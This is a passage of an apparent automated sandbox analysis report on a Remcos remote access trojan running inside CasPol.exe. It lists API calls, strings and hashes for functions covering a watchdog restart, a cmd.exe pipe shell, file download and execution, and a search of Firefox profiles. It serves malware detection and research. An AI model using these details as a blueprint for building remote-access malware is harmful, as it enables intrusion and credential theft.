                            Function 0044F3DD Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                            • _free.LIBCMT ref: 0044F41A
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnvironmentStrings$Free_free
                            • String ID:
                            • API String ID: 2716640707-0
                            • Opcode ID: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                            • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                            • Opcode Fuzzy Hash: f3c2c49517413e8eabdba28df60095274e0f4285ab7e88089faf331cb05c3344
                            • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                            Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00413569
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                            • RegCloseKey.KERNELBASE(?), ref: 00413592
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                            • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                            • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                            Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C19C,00466C48), ref: 00413516
                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C19C,00466C48), ref: 0041352A
                            • RegCloseKey.KERNELBASE(?,?,?,0040C19C,00466C48), ref: 00413535
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID:
                            • API String ID: 3677997916-0
                            • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                            • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                            • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                            Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                            • RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                            • RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID:
                            • API String ID: 1818849710-0
                            • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                            • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                            • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                            Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: _wcslen
                            • String ID: pQG
                            • API String ID: 176396367-3769108836
                            • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                            • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                            • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                            • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                            Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                            Download Yara Rule
                            APIs
                            • GlobalMemoryStatusEx.KERNELBASE(?), ref: 0041B7CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: GlobalMemoryStatus
                            • String ID: @
                            • API String ID: 1890195054-2766056989
                            • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                            • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                            • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                            • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                            Function 00449BF0 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 00449C3C
                            • GetFileType.KERNELBASE(00000000), ref: 00449C4E
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileHandleType
                            • String ID:
                            • API String ID: 3000768030-0
                            • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                            • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                            • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                            • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                            Function 00446185 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 004461A6
                              • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap$_free
                            • String ID:
                            • API String ID: 1482568997-0
                            • Opcode ID: faad750e247cad17ebccd4cbcbb14699b820db20798bfdb49a30fe1b63b842b1
                            • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                            • Opcode Fuzzy Hash: faad750e247cad17ebccd4cbcbb14699b820db20798bfdb49a30fe1b63b842b1
                            • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                            Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                            Download Yara Rule
                            APIs
                            • socket.WS2_32(?,00000001,00000006), ref: 00404852
                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                              • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CreateEventStartupsocket
                            • String ID:
                            • API String ID: 1953588214-0
                            • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                            • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                            • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                            • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                            Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                            • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                            • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                            • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                            Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32 ref: 0041BAB8
                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BACB
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$ForegroundText
                            • String ID:
                            • API String ID: 29597999-0
                            • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                            • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                            • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                            • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                            Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                            Download Yara Rule
                            APIs
                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                            • WSASetLastError.WS2_32(00000000), ref: 00414F10
                              • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                              • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                              • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                              • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                              • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                              • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                            • String ID:
                            • API String ID: 1170566393-0
                            • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                            • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                            • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                            • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                            Function 004500D4 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00445AF3: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                            • _free.LIBCMT ref: 00450140
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                            • Instruction ID: a633634cbf7549e5c455a263606fb7810d0d6e042387cb83ce13a77316281608
                            • Opcode Fuzzy Hash: fdbd8fd48d54792b4aab90f4371f9c4c5731c6c52bc699df08f3ae970cc02b1f
                            • Instruction Fuzzy Hash: 67014E761007449BE3218F59D881D5AFBD8FB85374F25061EE5D4532C1EA746805C779
                            Function 00445AF3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000), ref: 00445B34
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                            • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                            • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                            • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                            Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                            • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                            • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                            • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                            Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                            Download Yara Rule
                            APIs
                            • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Startup
                            • String ID:
                            • API String ID: 724789610-0
                            • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                            • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                            • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                            • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                            Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: send
                            • String ID:
                            • API String ID: 2809346765-0
                            • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                            • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                            • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                            • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                            Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                            • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                            • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                            • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725

                            Non-executed Functions

                            Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                            Download Yara Rule
                            APIs
                            • SetEvent.KERNEL32(?,?), ref: 00407CB9
                            • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                            • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                              • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                              • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                              • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                            • DeleteFileA.KERNEL32(?), ref: 00408652
                              • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                              • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                              • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                              • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                            • Sleep.KERNEL32(000007D0), ref: 004086F8
                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                              • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                            • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                            • API String ID: 1067849700-181434739
                            • Opcode ID: 4e58a0086eefa5a7d711f599d6b504f8132a4b145ccff10764beb7e3a44898d0
                            • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                            • Opcode Fuzzy Hash: 4e58a0086eefa5a7d711f599d6b504f8132a4b145ccff10764beb7e3a44898d0
                            • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                            Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                            Download Yara Rule
                            APIs
                            • __Init_thread_footer.LIBCMT ref: 004056E6
                              • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                            • __Init_thread_footer.LIBCMT ref: 00405723
                            • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                            • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                              • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                            • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                            • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                            • CloseHandle.KERNEL32 ref: 00405A23
                            • CloseHandle.KERNEL32 ref: 00405A2B
                            • CloseHandle.KERNEL32 ref: 00405A3D
                            • CloseHandle.KERNEL32 ref: 00405A45
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                            • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                            • API String ID: 2994406822-18413064
                            • Opcode ID: f2df485092cbe6057ce6a4185479275cf786d78173371152c76b7b1936626912
                            • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                            • Opcode Fuzzy Hash: f2df485092cbe6057ce6a4185479275cf786d78173371152c76b7b1936626912
                            • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                            Function 004120F7 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 238threadCOMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 00412106
                              • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                              • Part of subcall function 00413877: RegSetValueExA.KERNELBASE(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                              • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                            • CloseHandle.KERNEL32(00000000), ref: 00412155
                            • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                            • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                            • API String ID: 3018269243-13974260
                            • Opcode ID: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                            • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                            • Opcode Fuzzy Hash: cf8836db070dde1e79f7b372f7e703d1748ead536f5279adb044898871b6b780
                            • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                            Function 0040BB30 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 146fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBAF
                            • FindClose.KERNEL32(00000000), ref: 0040BBC9
                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040BCEC
                            • FindClose.KERNEL32(00000000), ref: 0040BD12
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.3733384161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_400000_CasPol.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseFile$FirstNext
